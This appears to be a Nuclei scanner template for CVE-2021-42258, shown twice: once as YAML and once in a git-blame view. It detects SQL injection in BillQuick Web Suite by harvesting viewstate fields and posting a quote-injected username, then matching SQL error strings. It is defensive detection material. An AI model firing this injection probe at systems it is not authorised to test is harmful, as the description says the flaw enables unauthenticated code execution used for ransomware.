nuclei-templates/cves/2021/CVE-2021-42258.yaml

id: CVE-2021-42258

info:
  name: BillQuick Web Suite SQLi
  author: dwisiswant0
  severity: critical
  tags: cve,cve2021,sqli,billquick
  description: |
    BQE BillQuick Web Suite 2018 through 2021 before 22.0.9.1
    allows SQL injection for unauthenticated remote code execution,
    as exploited in the wild in October 2021 for ransomware installation.
    SQL injection can, for example, use the txtID (aka username) parameter.
    Successful exploitation can include the ability to execute
    arbitrary code as MSSQLSERVER$ via xp_cmdshell.
  reference:
    - https://www.huntress.com/blog/threat-advisory-hackers-are-exploiting-a-vulnerability-in-popular-billing-software-to-deploy-ransomware
    - https://nvd.nist.gov/vuln/detail/CVE-2021-42258
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.80
    cve-id: CVE-2021-42258
    cwe-id: CWE-89

requests:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Referer: {{BaseURL}}
        Origin: {{RootURL}}
        Content-Type: application/x-www-form-urlencoded

        __EVENTTARGET=cmdOK&__EVENTARGUMENT=&__VIEWSTATE={{url_encode("§VS§")}}&__VIEWSTATEGENERATOR={{url_encode("§VSG§")}}&__EVENTVALIDATION={{url_encode("§EV§")}}&txtID=uname%27&txtPW=passwd&hdnClientDPI=96

    cookie-reuse: true
    extractors:
      - type: xpath
        name: VS
        internal: true
        attribute: value
        xpath:
          - "/html/body/form/div/input[@id='__VIEWSTATE']"

      - type: xpath
        name: VSG
        internal: true
        attribute: value
        xpath:
          - "/html/body/form/div/input[@id='__VIEWSTATEGENERATOR']"

      - type: xpath
        name: EV
        internal: true
        attribute: value
        xpath:
          - "/html/body/form/div/input[@id='__EVENTVALIDATION']"

    matchers:
      - type: word
        part: body
        condition: and
        words:
          - "System.Data.SqlClient.SqlException"
          - "Incorrect syntax near"
          - "_ACCOUNTLOCKED"
Add CVE-2021-42258 2021-10-26 08:26:22 +00:00			`id: CVE-2021-42258`

			`info:`
			`name: BillQuick Web Suite SQLi`
			`author: dwisiswant0`
Auto Generated CVE annotations [Fri Oct 29 10:29:18 UTC 2021] :robot: 2021-10-29 10:29:18 +00:00			`severity: critical`
misc update 2021-10-26 09:02:23 +00:00			`tags: cve,cve2021,sqli,billquick`
Add CVE-2021-42258 2021-10-26 08:26:22 +00:00			`description: \|`
			`BQE BillQuick Web Suite 2018 through 2021 before 22.0.9.1`
			`allows SQL injection for unauthenticated remote code execution,`
			`as exploited in the wild in October 2021 for ransomware installation.`
			`SQL injection can, for example, use the txtID (aka username) parameter.`
			`Successful exploitation can include the ability to execute`
			`arbitrary code as MSSQLSERVER$ via xp_cmdshell.`
misc update 2021-10-26 09:02:23 +00:00			`reference:`
			`- https://www.huntress.com/blog/threat-advisory-hackers-are-exploiting-a-vulnerability-in-popular-billing-software-to-deploy-ransomware`
			`- https://nvd.nist.gov/vuln/detail/CVE-2021-42258`
Auto Generated CVE annotations [Fri Oct 29 10:29:18 UTC 2021] :robot: 2021-10-29 10:29:18 +00:00			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
			`cvss-score: 9.80`
			`cve-id: CVE-2021-42258`
			`cwe-id: CWE-89`
Add CVE-2021-42258 2021-10-26 08:26:22 +00:00
			`requests:`
			`- raw:`
			`- \|`
			`GET / HTTP/1.1`
			`Host: {{Hostname}}`

			`- \|`
			`POST / HTTP/1.1`
			`Host: {{Hostname}}`
			`Referer: {{BaseURL}}`
			`Origin: {{RootURL}}`
			`Content-Type: application/x-www-form-urlencoded`

			`__EVENTTARGET=cmdOK&__EVENTARGUMENT=&__VIEWSTATE={{url_encode("§VS§")}}&__VIEWSTATEGENERATOR={{url_encode("§VSG§")}}&__EVENTVALIDATION={{url_encode("§EV§")}}&txtID=uname%27&txtPW=passwd&hdnClientDPI=96`

			`cookie-reuse: true`
			`extractors:`
			`- type: xpath`
			`name: VS`
			`internal: true`
			`attribute: value`
			`xpath:`
			`- "/html/body/form/div/input[@id='__VIEWSTATE']"`

			`- type: xpath`
			`name: VSG`
			`internal: true`
			`attribute: value`
			`xpath:`
			`- "/html/body/form/div/input[@id='__VIEWSTATEGENERATOR']"`

			`- type: xpath`
			`name: EV`
			`internal: true`
			`attribute: value`
			`xpath:`
			`- "/html/body/form/div/input[@id='__EVENTVALIDATION']"`

			`matchers:`
			`- type: word`
			`part: body`
Adding condition between word matcher 2021-10-26 08:55:37 +00:00			`condition: and`
Add CVE-2021-42258 2021-10-26 08:26:22 +00:00			`words:`
Adding condition between word matcher 2021-10-26 08:55:37 +00:00			`- "System.Data.SqlClient.SqlException"`
Add CVE-2021-42258 2021-10-26 08:26:22 +00:00			`- "Incorrect syntax near"`
Adding condition between word matcher 2021-10-26 08:55:37 +00:00			`- "_ACCOUNTLOCKED"`